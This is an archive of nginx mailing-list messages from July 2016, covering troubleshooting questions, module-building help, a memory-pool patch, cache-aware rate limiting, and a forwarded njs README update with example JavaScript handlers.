infographic please suggest me how to fix this ? Regards skorpinok Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268312,268312#msg-268312 From hobson42 at gmail.com Sat Jul 16 09:39:28 2016 From: hobson42 at gmail.com (Ian Hobson) Date: Sat, 16 Jul 2016 10:39:28 +0100 Subject: Images loaded but not displaying In-Reply-To: <57b40e55436b16b14e2832f89b12b86c.NginxMailingListEnglish@forum.nginx.org> References: <57b40e55436b16b14e2832f89b12b86c.NginxMailingListEnglish@forum.nginx.org> Message-ID: <93d234ce-1035-d431-0f6d-f789347a28ec@gmail.com> Hi skorpinok Two points: 1) Use correct HTML, or you can only blame yourself if different browsers mangle it each in their own way. The structure is Html 5 only. </head> <body> page content properly nested. </body> </html> (eof) 2) The src url takes its root as the location of the current page (unless overridden with a base tag in the head area). My guess is you need <img src="/images/infographic.jpg" .... Regards Ian On 16/07/2016 09:31, skorpinok wrote: > Hi, i have installed nginx/1.2.1 on a debian 7 server, the image seems to > have been loaded but shows broken & are not displayed on my index.html > page > > here is what did, > > html> > <head> > <title>Welcome to nginx! > > >

Welcome to nginx!

> > > > > > > infographic width="800" height="800"> > > > > > > > please suggest me how to fix this ? > > Regards > skorpinok > From nginx-forum at forum.nginx.org Sat Jul 16 09:56:42 2016 From: nginx-forum at forum.nginx.org (skorpinok) Date: Sat, 16 Jul 2016 05:56:42 -0400 Subject: Images loaded but not displaying In-Reply-To: <93d234ce-1035-d431-0f6d-f789347a28ec@gmail.com> References: <93d234ce-1035-d431-0f6d-f789347a28ec@gmail.com> Message-ID: <8086be95cd4b76a52d78d37d8aaa2d0a.NginxMailingListEnglish@forum.nginx.org> Hi, Ian Hobson, thanks its fixed, Message-ID: <00552183-15eb-4183-806e-f834d6051eaa@email.android.com> An HTML attachment was scrubbed... URL: From lists at ruby-forum.com Sun Jul 17 09:19:10 2016 From: lists at ruby-forum.com (Andrii Balytskyi) Date: Sun, 17 Jul 2016 11:19:10 +0200 Subject: CentOS 5 - NGiNX - AIO In-Reply-To: <4AFAA4EB.7060903@internetx.de> References: <4AFAA4EB.7060903@internetx.de> Message-ID: <361b6a9795cdac80df711317fa275fea@ruby-forum.com> ?? ????? ???? ???????? ? AIO ??????????????? ? ???????, ?? ?????? ??? ????????????? ????????? ???????. ? ???????? ????????? ??? ????????????? ?????? Uppod. -- Posted via http://www.ruby-forum.com/. From nginx-forum at forum.nginx.org Sun Jul 17 14:18:58 2016 From: nginx-forum at forum.nginx.org (pcd) Date: Sun, 17 Jul 2016 10:18:58 -0400 Subject: Slow performance when sending a large file upload request via proxy_pass Message-ID: <0eb425c4e764553662e0da37880fa56f.NginxMailingListEnglish@forum.nginx.org> I'm trying to diagnose some strange behavior in my web app, and at the moment it seems like nginx may be at fault, though I'd be happy to learn otherwise. On the client side, I'm using flow.js (https://github.com/flowjs/flow.js) to upload a file to the server. This library should allow me to upload very large files by splitting them up into (by default) 1MB chunks, and sending each chunk as a standard file form upload request. 
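The chunk-splitting scheme just described can be sketched in a few lines of Python (a generic illustration of fixed-size slicing — this is not flow.js's actual code, and the 1 MB default simply mirrors the chunk size mentioned in the message):

```python
def split_into_chunks(data: bytes, chunk_size: int = 1024 * 1024):
    """Yield successive fixed-size slices, mirroring how flow.js cuts a
    file into chunks before sending each one as a form upload request."""
    for offset in range(0, len(data), chunk_size):
        yield data[offset:offset + chunk_size]

# A 2.5 MB payload becomes two full 1 MB chunks plus a 0.5 MB remainder,
# i.e. three separate POST requests on the wire.
payload = b"x" * (2 * 1024 * 1024 + 512 * 1024)
chunks = list(split_into_chunks(payload))
```

Each chunk travels as its own POST, so any fixed per-request cost in the proxy path is multiplied by the number of chunks, which is why shrinking the chunk size can make the overall upload slower.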
On the server, I am connecting to a Python WSGI server (gunicorn) via try_files / proxy_pass. The configuration is very standard:

location / {
    root /var/www;
    index index.html index.htm;
    try_files $uri $uri/ @proxy_to_app;
}

location @proxy_to_app {
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header Host $http_host;
    proxy_redirect off;
    proxy_pass http://app_server;
}

The Python code is pretty simple, mainly just opening the file and writing the data. According to the gunicorn access log, each request takes around 135ms:

127.0.0.1 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.0" 200 - ... 0.135206
127.0.0.1 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.0" 200 - ... 0.136749
127.0.0.1 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.0" 200 - ... 0.137314

But in the nginx access log, the $request_time varies wildly and is usually very large:

10.0.0.0 - - [17/Jul/2016:05:07:06 +0000] "POST /files HTTP/1.1" 200 ... 0.956
10.0.0.0 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.1" 200 ... 0.553
10.0.0.0 - - [17/Jul/2016:05:07:07 +0000] "POST /files HTTP/1.1" 200 ... 0.888

At first I thought it might be the network itself taking a long time to send the data, but looking at the network logs in the browser doesn't seem to bear this out. Once the socket connection is established, Chrome says that the request time is often as low as 8ms, with the extra ~0.5s-1s spent waiting for a response. So the question is, what is nginx doing during all that extra time? On normal (small) requests, the times in the two logs are identical, but even dialing down the chunk size in flow.js to 128kb or 64kb results in a delay in nginx, and it's making it take way too long to upload these files (I can't just set the chunk size to something super small like 4kb, because the overhead of making so many requests makes the uploads slower). 
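To narrow down where the extra time is spent, the two timings can be compared inside nginx itself. This is a sketch using standard nginx log variables, not configuration taken from this thread:

```nginx
# $request_time spans the whole request, including reading the client
# body; $upstream_response_time covers only the time spent talking to
# gunicorn.  A large gap between the two points at body transfer or
# buffering on the nginx side rather than at the application.
log_format timing '$remote_addr [$time_local] "$request" $status '
                  'req=$request_time up=$upstream_response_time '
                  'len=$request_length';
access_log /var/log/nginx/upload_timing.log timing;
```

If up= stays near gunicorn's ~135ms while req= carries the extra half second, the delay is between the client and nginx (or in nginx's request-body handling), not in the proxied application.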
I've tried messing with various configuration options including proxy_buffer_size and proxy_request_buffering, to no effect. Any ideas on next steps for how I could begin to diagnose this? Extra info: CentOS 7, running on AWS nginx version: nginx/1.10.1 built by gcc 4.8.5 20150623 (Red Hat 4.8.5-4) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib64/nginx/modules --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-http_xslt_module=dynamic --with-http_image_filter_module=dynamic --with-http_geoip_module=dynamic --with-http_perl_module=dynamic --add-dynamic-module=njs-1c50334fbea6/nginx --with-threads --with-stream --with-stream_ssl_module --with-http_slice_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_v2_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -m64 -mtune=generic' Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268317,268317#msg-268317 From pankajitbhu at gmail.com Mon Jul 18 06:58:34 2016 From: pankajitbhu at gmail.com (Pankaj 
Chaudhary) Date: Mon, 18 Jul 2016 12:28:34 +0530 Subject: while building own nginx module error to find user defined header file Message-ID: Hi All, I have written my own nginx module and i have my user defined header files but while building i am getting error header file not found. my module will act as a filter. Please help me. Regards, Pankaj -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Jul 18 13:09:29 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 18 Jul 2016 16:09:29 +0300 Subject: while building own nginx module error to find user defined header file In-Reply-To: References: Message-ID: <20160718130929.GA57459@mdounin.ru> Hello! On Mon, Jul 18, 2016 at 12:28:34PM +0530, Pankaj Chaudhary wrote: > I have written my own nginx module and i have my user defined header files > but while building i am getting error header file not found. If you are using header files in your module, you have to add your module directory to the list of include paths. Assuming you are using auto/module script to configure your module, you should do something like this in your module ./config script: ngx_module_type=HTTP_AUX_FILTER ngx_module_name=ngx_http_example_filter_module ngx_module_incs=$ngx_addon_dir ngx_module_deps= ngx_module_srcs=$ngx_addon_dir/ngx_http_example_filter_module.c ngx_module_libs= . 
auto/module -- Maxim Dounin http://nginx.org/ From liangsijian at foxmail.com Mon Jul 18 16:38:58 2016 From: liangsijian at foxmail.com (=?gb18030?B?wbrLvL2h?=) Date: Tue, 19 Jul 2016 00:38:58 +0800 Subject: fix ngx_reset_pool Message-ID: # HG changeset patch # User Liang Sijian # Date 1468859189 -28800 # Tue Jul 19 00:26:29 2016 +0800 # Node ID 45ef1e0a48a82b2a81db6bc447aaeb16a10056f9 # Parent 6acaa638fa074dada02ad4544a299584da9abc85 fix ngx_reset_pool diff --git a/src/core/ngx_palloc.c b/src/core/ngx_palloc.c --- a/src/core/ngx_palloc.c +++ b/src/core/ngx_palloc.c @@ -109,7 +109,8 @@ ngx_reset_pool(ngx_pool_t *pool) } for (p = pool; p; p = p->d.next) { - p->d.last = (u_char *) p + sizeof(ngx_pool_t); + p->d.last = (u_char *) p + + (p == pool ? sizeof(ngx_pool_t ) : sizeof(ngx_pool_data_t)); p->d.failed = 0; } -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Jul 18 18:50:36 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 18 Jul 2016 21:50:36 +0300 Subject: fix ngx_reset_pool In-Reply-To: References: Message-ID: <20160718185036.GI57459@mdounin.ru> Hello! On Tue, Jul 19, 2016 at 12:38:58AM +0800, ??? wrote: > # HG changeset patch > # User Liang Sijian > # Date 1468859189 -28800 > # Tue Jul 19 00:26:29 2016 +0800 > # Node ID 45ef1e0a48a82b2a81db6bc447aaeb16a10056f9 > # Parent 6acaa638fa074dada02ad4544a299584da9abc85 > fix ngx_reset_pool > > diff --git a/src/core/ngx_palloc.c b/src/core/ngx_palloc.c > --- a/src/core/ngx_palloc.c > +++ b/src/core/ngx_palloc.c > @@ -109,7 +109,8 @@ ngx_reset_pool(ngx_pool_t *pool) > } > > for (p = pool; p; p = p->d.next) { > - p->d.last = (u_char *) p + sizeof(ngx_pool_t); > + p->d.last = (u_char *) p + > + (p == pool ? 
sizeof(ngx_pool_t ) : sizeof(ngx_pool_data_t)); > p->d.failed = 0; > } A previous attempt to "fix" this can be found here, it looks slightly better from my point of view: http://mailman.nginx.org/pipermail/nginx-devel/2010-June/000351.html Though we are quite happy with the current code, while it is not optimal - it is simple and good enough from practical point of view. -- Maxim Dounin http://nginx.org/ From linnading1989 at gmail.com Mon Jul 18 19:27:19 2016 From: linnading1989 at gmail.com (Linna.Ding) Date: Mon, 18 Jul 2016 15:27:19 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting Message-ID: Hi, I use Nginx as reverse proxy, and I would like to rate limit the requests to origin server, but only limit the requests with cache status EXPIRED. I just tested with a map "cache_key", and the rate limiting doesn't work, the $cache_key was logged as empty string. But changing $upstream_cache_status to non-upstream variables like $remote_addr and adding an IP match value will make the rate limiting work. The zone I defined like so: limit_req_zone $cache_key zone=cache_host:1m rate=1r/m; map $upstream_cache_status $cache_key { EXPIRED $host; default ""; } I enabled cache setting in nginx.conf, and one of my server chunk uses the rate limit zone like below: limit_req zone=cache_host busrt=1; Is this because $upstream_cache_status value is set after the request is sent to origin server and got the response, while $cache_key is used in rate limit zone which checked before the request was sent to origin server? If so, is there a recommended way to implement rate limiting only for requests with specific cache status? Thanks! Linna -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From pankajitbhu at gmail.com Tue Jul 19 09:44:32 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Tue, 19 Jul 2016 15:14:32 +0530 Subject: while building own nginx module error to find user defined header file In-Reply-To: <20160718130929.GA57459@mdounin.ru> References: <20160718130929.GA57459@mdounin.ru> Message-ID: Hi , Thank you, after using this script also i am getting same error. I have makefile which provide other header file path and third party lib path. I have structure like this module_folder/ 1.module.cpp 2.config 3.Makefile and having sub parent folder which contain other dependency code. so please let me know what i should do. On Mon, Jul 18, 2016 at 6:39 PM, Maxim Dounin wrote: > Hello! > > On Mon, Jul 18, 2016 at 12:28:34PM +0530, Pankaj Chaudhary wrote: > > > I have written my own nginx module and i have my user defined header > files > > but while building i am getting error header file not found. > > If you are using header files in your module, you have to add your > module directory to the list of include paths. > > Assuming you are using auto/module script to configure your > module, you should do something like this in your module ./config > script: > > ngx_module_type=HTTP_AUX_FILTER > ngx_module_name=ngx_http_example_filter_module > ngx_module_incs=$ngx_addon_dir > ngx_module_deps= > ngx_module_srcs=$ngx_addon_dir/ngx_http_example_filter_module.c > ngx_module_libs= > > . auto/module > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From pankajitbhu at gmail.com Wed Jul 20 09:03:28 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Wed, 20 Jul 2016 14:33:28 +0530 Subject: error nginx: [emerg] dlopen() "/usr/local/nginx/modules/ds_http_module.so" failed (/usr/local/nginx/modules/ds_http_module.so: undefined symbol: ds_http_module Message-ID: Hi All, I am getting error below error for own written module ds_http_module. nginx: [emerg] dlopen() "/usr/local/nginx/modules/ds_http_module.so" failed (/usr/local/nginx/modules/ds_http_module.so: undefined symbol: ds_http_module Please let me know what could be the reason of this error. Regards, Pankaj -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 20 09:33:18 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 20 Jul 2016 05:33:18 -0400 Subject: ngx_http_upstream_status_variable question Message-ID: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> ngx_http_upstream_status_variable len = r->upstream_states->nelts * (3 + 2); write status to string, one status str len would be 3 in most case, like 200, 302, 404.... but if upstream multi times, may be add ' : ' as separator so, string len may be nelts*3 + (nelts-1)*3 = 6nelts - 3 != nelts * (3 + 2); what's wrong here? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268369,268369#msg-268369 From pankajitbhu at gmail.com Wed Jul 20 12:29:20 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Wed, 20 Jul 2016 17:59:20 +0530 Subject: while building own nginx module error to find user defined header file In-Reply-To: References: <20160718130929.GA57459@mdounin.ru> Message-ID: I have makefile which provide other header file path and third party lib path. I have structure like this module_folder/ 1.module.cpp 2.config 3.Makefile and having sub parent folder which contain other dependency code. 
so please let me know what i should do On Tue, Jul 19, 2016 at 3:14 PM, Pankaj Chaudhary wrote: > Hi , > Thank you, > > after using this script also i am getting same error. > I have makefile which provide other header file path and third party lib > path. > I have structure like this > module_folder/ > 1.module.cpp > 2.config > 3.Makefile > > and having sub parent folder which contain other dependency code. > > so please let me know what i should do. > > > > On Mon, Jul 18, 2016 at 6:39 PM, Maxim Dounin wrote: > >> Hello! >> >> On Mon, Jul 18, 2016 at 12:28:34PM +0530, Pankaj Chaudhary wrote: >> >> > I have written my own nginx module and i have my user defined header >> files >> > but while building i am getting error header file not found. >> >> If you are using header files in your module, you have to add your >> module directory to the list of include paths. >> >> Assuming you are using auto/module script to configure your >> module, you should do something like this in your module ./config >> script: >> >> ngx_module_type=HTTP_AUX_FILTER >> ngx_module_name=ngx_http_example_filter_module >> ngx_module_incs=$ngx_addon_dir >> ngx_module_deps= >> ngx_module_srcs=$ngx_addon_dir/ngx_http_example_filter_module.c >> ngx_module_libs= >> >> . auto/module >> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From nginx-forum at forum.nginx.org Wed Jul 20 14:03:55 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 20 Jul 2016 10:03:55 -0400 Subject: ngx_http_upstream_status_variable question In-Reply-To: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> References: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> Message-ID: <84e06d722fc691fe3b6b03fdd4dccd71.NginxMailingListEnglish@forum.nginx.org> also ngx_http_upstream_response_time_variable and ngx_http_upstream_response_length_variable, + 2 for separator if (state[i].peer) { *p++ = ','; *p++ = ' '; } else { *p++ = ' '; *p++ = ':'; *p++ = ' '; if (++i == r->upstream_states->nelts) { break; } continue; } it can be 3 bytes, right? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268369,268374#msg-268374 From pankajitbhu at gmail.com Wed Jul 20 14:12:58 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Wed, 20 Jul 2016 19:42:58 +0530 Subject: error while building own nginx module Message-ID: Hi i have written own nginx module and i have many header ,src and makefiles files . my nginx module folder structure look like below /product/src/nginx/ngx_http_auth_module.cpp /product/src/nginx/Makefile /product/src/nginx/config(nginx config file) /product/src/common/.cpp files /product/lib/.so files /product/src/utility/.c and .h files i have written my config file like this *************************************************************** ngx_module_type=HTTP_AUX_FILTER_MODULES ngx_module_name=ngx_http_auth_module ngx_module_incs=$ngx_addon_dir ngx_module_deps= ngx_module_srcs=$ngx_addon_dir/ngx_http_auth_module.cpp \ $ngx_addon_dir/Makefile ngx_module_libs= . auto/module *************************************************************************** code build successfully and generated ngx_http_auth_module.so file but not correctly since i am getting below error while loading in nginx.conf file. 
nginx: [emerg] dlopen() "/usr/local/nginx/modules/ngx_http_auth_module.so" failed (/usr/local/nginx/modules/ngx_http_auth_module.so: undefined symbol: ngx_http_auth_module) Please let me know the correct way to do this. Thanks & Regards, Pankaj Chaudhary -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 20 14:39:42 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 20 Jul 2016 10:39:42 -0400 Subject: ngx_http_upstream_status_variable question In-Reply-To: <84e06d722fc691fe3b6b03fdd4dccd71.NginxMailingListEnglish@forum.nginx.org> References: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> <84e06d722fc691fe3b6b03fdd4dccd71.NginxMailingListEnglish@forum.nginx.org> Message-ID: <74dbbd942b617d53d09b73dc5ef7bdaf.NginxMailingListEnglish@forum.nginx.org> Figured it out - it would jump one position for the 3-byte separator. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268369,268379#msg-268379 From nginx-forum at forum.nginx.org Wed Jul 20 18:03:44 2016 From: nginx-forum at forum.nginx.org (linnading) Date: Wed, 20 Jul 2016 14:03:44 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: References: Message-ID: <00a41c9f43f462570378fbed79b15105.NginxMailingListEnglish@forum.nginx.org> I assume the $upstream_cache_status variable is set after requests are sent and responses are received. But is there a way to do rate limiting that ignores the cache? Really appreciate any help on this. Thanks. 
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268345,268383#msg-268383 From francis at daoine.org Wed Jul 20 18:16:23 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 20 Jul 2016 19:16:23 +0100 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <00a41c9f43f462570378fbed79b15105.NginxMailingListEnglish@forum.nginx.org> References: <00a41c9f43f462570378fbed79b15105.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160720181623.GS12280@daoine.org> On Wed, Jul 20, 2016 at 02:03:44PM -0400, linnading wrote: Hi there, > I assume $upstream_cache_status variable is set after requests are sent and > responses are got. But is there a way to do do rate limiting ignoring cache? > Really appreciate any help on this. I'm afraid that, having read the mails, I'm not at all sure what kind of limiting you want to do. If 10 requests come in at the same time to-or-from the same something, you want the last few requests to be delayed or rejected. What is the "something" that you care about? f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Wed Jul 20 18:52:10 2016 From: nginx-forum at forum.nginx.org (linnading) Date: Wed, 20 Jul 2016 14:52:10 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <20160720181623.GS12280@daoine.org> References: <20160720181623.GS12280@daoine.org> Message-ID: <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> Hi Francis, It is "to the same upstream server" that I care about. I would like to limit the request rate to the same upstream server. The Scenarios is like: 10 requests at the same time to the same upstream server, the upstream server should only receive requests at rate 1r/m. Last few requests will be delayed or rejected. But for these last few requests, some of them can be served by cache, they should not be delayed/rejected. 
Thanks, Linna Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268345,268386#msg-268386 From tfransosi at gmail.com Wed Jul 20 19:51:16 2016 From: tfransosi at gmail.com (Thiago Farina) Date: Wed, 20 Jul 2016 16:51:16 -0300 Subject: how can i get nginx lib In-Reply-To: References: Message-ID: On Mon, Jun 27, 2016 at 8:37 AM, Pankaj Chaudhary wrote: > > > Is there such thing? As far as I know it is distributed only as binary. -- Thiago Farina -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Jul 20 21:28:39 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 20 Jul 2016 22:28:39 +0100 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> References: <20160720181623.GS12280@daoine.org> <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160720212839.GT12280@daoine.org> On Wed, Jul 20, 2016 at 02:52:10PM -0400, linnading wrote: Hi there, > It is "to the same upstream server" that I care about. I would like to > limit the request rate to the same upstream server. That makes sense, thanks. I am not aware of a way to achieve this directly in stock nginx. I see that there is a third-party module at https://github.com/cfsego/nginx-limit-upstream which looks like it aims to do what you want; and I see that nginx-plus has a "max_conns" value per server in an upstream block, documented at http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server If non-stock is ok for you, possibly one of those can work? > The Scenarios is like: > 10 requests at the same time to the same upstream server, the upstream > server should only receive requests at rate 1r/m. Last few requests will be > delayed or rejected. But for these last few requests, some of them can be > served by cache, they should not be delayed/rejected. 
I think that the limit_* directives implementation is such that the choice is made before the upstream is chosen; and there are no explicit limits on the connections to upstream. That is likely why the third-party module was created. Cheers, f -- Francis Daly francis at daoine.org From vbart at nginx.com Wed Jul 20 21:56:39 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 21 Jul 2016 00:56:39 +0300 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> References: <20160720181623.GS12280@daoine.org> <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> Message-ID: <6618836.ec03c104XX@vbart-laptop> On Wednesday 20 July 2016 14:52:10 linnading wrote: > Hi Francis, > > It is "to the same upstream server" that I care about. I would like to > limit the request rate to the same upstream server. > > The Scenarios is like: > 10 requests at the same time to the same upstream server, the upstream > server should only receive requests at rate 1r/m. Last few requests will be > delayed or rejected. But for these last few requests, some of them can be > served by cache, they should not be delayed/rejected. > [..] While "proxy_cache_lock" isn't what you're asking about, it can significantly reduce number of requests that reaches your upstream server. http://nginx.org/r/proxy_cache_lock wbr, Valentin V. Bartenev From maxim at nginx.com Thu Jul 21 07:26:42 2016 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 21 Jul 2016 10:26:42 +0300 Subject: Fwd: [njs] Updated README to reflect changes in HTTP and Stream modules. In-Reply-To: References: Message-ID: <1e2593e6-d46f-351c-adb8-2bfd03a83f7c@nginx.com> Hello, For those who doesn't follow njs project closely: Roman and Igor just added njs support to the stream module and moved js scripting to separate files. 
More details in the project README file you can find here: http://hg.nginx.org/njs/file/tip/README -------- Forwarded Message -------- Subject: [njs] Updated README to reflect changes in HTTP and Stream modules. Date: Wed, 20 Jul 2016 16:39:30 +0000 From: Roman Arutyunyan Reply-To: nginx-devel at nginx.org To: nginx-devel at nginx.org details: http://hg.nginx.org/njs/rev/3f8f801e2f53 branches: changeset: 125:3f8f801e2f53 user: Roman Arutyunyan date: Wed Jul 20 19:38:00 2016 +0300 description: Updated README to reflect changes in HTTP and Stream modules. diffstat: README | 225 +++++++++++++++++++++++++++++++++++++++++----------------------- 1 files changed, 144 insertions(+), 81 deletions(-) diffs (264 lines): diff -r 740defed7584 -r 3f8f801e2f53 README --- a/README Wed Jul 20 18:20:17 2016 +0300 +++ b/README Wed Jul 20 19:38:00 2016 +0300 @@ -1,5 +1,6 @@ -Configure nginx with HTTP JavaScript module using the --add-module option: +Configure nginx with HTTP and Stream JavaScript modules using the --add-module +option: ./configure --add-module=/nginx @@ -14,30 +15,39 @@ and add the following line to nginx.conf Please report your experiences to the NGINX development mailing list nginx-devel at nginx.org (http://mailman.nginx.org/mailman/listinfo/nginx-devel). -JavaScript objects ------------------- -$r -|- uri -|- method -|- httpVersion -|- remoteAddress -|- headers{} -|- args{} -|- response - |- status - |- headers{} - |- contentType - |- contentLength - |- sendHeader() - |- send(data) - |- finish() +HTTP JavaScript module +---------------------- + +Each HTTP JavaScript handler receives two arguments - request and response. + + function foo(req, res) { + .. 
+ } + +The following properties are available: + +req + - uri + - method + - httpVersion + - remoteAddress + - headers{} + - args{} + - variables{} + - log() + +res + - status + - headers{} + - contentType + - contentLength + - sendHeader() + - send() + - finish() -Example -------- - -Create nginx.conf: +Example nginx.conf: worker_processes 1; pid logs/nginx.pid; @@ -47,79 +57,132 @@ Create nginx.conf: } http { - js_set $summary " - var a, s, h; - - s = 'JS summary\n\n'; - - s += 'Method: ' + $r.method + '\n'; - s += 'HTTP version: ' + $r.httpVersion + '\n'; - s += 'Host: ' + $r.headers.host + '\n'; - s += 'Remote Address: ' + $r.remoteAddress + '\n'; - s += 'URI: ' + $r.uri + '\n'; - - s += 'Headers:\n'; - for (h in $r.headers) { - s += ' header \"' + h + '\" is \"' + $r.headers[h] + '\"\n'; - } - - s += 'Args:\n'; - for (a in $r.args) { - s += ' arg \"' + a + '\" is \"' + $r.args[a] + '\"\n'; - } - - s; - "; + # include JavaScript file + js_include js-http.js; server { listen 8000; location / { - js_run " - var res; - res = $r.response; - res.headers.foo = 1234; - res.status = 302; - res.contentType = 'text/plain; charset=utf-8'; - res.contentLength = 15; - res.sendHeader(); - res.send('nginx'); - res.send('java'); - res.send('script'); - res.finish(); - "; + # create $foo variable and set JavaScript function foo() + # from the included JavaScript file as its handler + js_set $foo foo; + + add_header X-Foo $foo; + + # register JavaScript function bar() as content handler + js_content baz; } location /summary { + js_set $summary summary; + return 200 $summary; } } } -Run nginx & test the output: - -$ curl 127.0.0.1:8000 - -nginxjavascript - -$ curl -H "Foo: 1099" '127.0.0.1:8000/summary?a=1&fooo=bar&zyx=xyz' - -JS summary -Method: GET -HTTP version: 1.1 -Host: 127.0.0.1:8000 -Remote Address: 127.0.0.1 -URI: /summary -Headers: - header "Host" is "127.0.0.1:8000" - header "User-Agent" is "curl/7.43.0" - header "Accept" is "*/*" - header "Foo" is "1099" -Args: - arg 
"a" is "1" - arg "fooo" is "bar" - arg "zyx" is "xyz" +js-http.js: + + function foo(req, res) { + req.log("hello from foo() handler"); + return "foo"; + } + + function summary(req, res) { + var a, s, h; + + s = "JS summary\n\n"; + + s += "Method: " + req.method + "\n"; + s += "HTTP version: " + req.httpVersion + "\n"; + s += "Host: " + req.headers.host + "\n"; + s += "Remote Address: " + req.remoteAddress + "\n"; + s += "URI: " + req.uri + "\n"; + + s += "Headers:\n"; + for (h in req.headers) { + s += " header '" + h + "' is '" + req.headers[h] + "'\n"; + } + + s += "Args:\n"; + for (a in req.args) { + s += " arg '" + a + "' is '" + req.args[a] + "'\n"; + } + + return s; + } + + function baz(req, res) { + res.headers.foo = 1234; + res.status = 200; + res.contentType = "text/plain; charset=utf-8"; + res.contentLength = 15; + res.sendHeader(); + res.send("nginx"); + res.send("java"); + res.send("script"); + + res.finish(); + } + + +Stream JavaScript module +------------------------ + +Each Stream JavaScript handler receives one argument - stream session object. + + function foo(s) { + .. 
